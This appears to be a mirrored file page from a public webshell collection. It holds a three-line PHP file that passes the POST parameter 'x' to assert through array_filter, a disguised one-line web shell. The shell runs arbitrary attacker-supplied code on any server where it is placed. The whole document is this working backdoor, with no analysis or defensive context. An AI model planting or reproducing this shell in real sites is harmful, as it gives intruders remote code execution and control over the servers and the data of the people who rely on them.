mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
3 lines
56 B
PHP
3 lines
56 B
PHP
<?php
|
|
array_filter(array($_POST['x']),'assert');
|
|
?>
|